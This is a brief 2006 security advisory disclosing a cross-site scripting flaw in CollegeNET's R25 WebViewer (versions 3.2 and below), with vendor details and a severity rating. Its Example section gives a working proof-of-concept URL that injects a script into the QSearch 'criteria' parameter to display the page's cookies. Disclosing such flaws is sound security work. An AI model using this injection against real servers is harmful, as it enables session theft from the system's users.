R25 WebViewer versions 3.2 and below are susceptible to cross site scripting attacks.
c0f3ecead194919393ae0627dbfbcd65dddb01676023d69724908cb0f9eeb57b
R25 XSS Vulnerability
=====================
Discovered By: Matthew Benenati <dk.mak0[AT]gmail[DOT]com>
Release Date: 3/3/2006
Vendor: CollegeNET
Versions: <=3.2
Severity: Medium
About
-----
R25 delivers the first campus-wide class and event scheduling software to unify all users on a single database, provide a completely customizable environment for each, and tap the power of the Internet for mass communication and e-commerce revenue opportunities.
Example
-------
R25 WebViewer is susceptible to cross site scripting:
http://<VICTIM>/wv3/wv3_servlet/urd/run/wv_event.QSearch?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E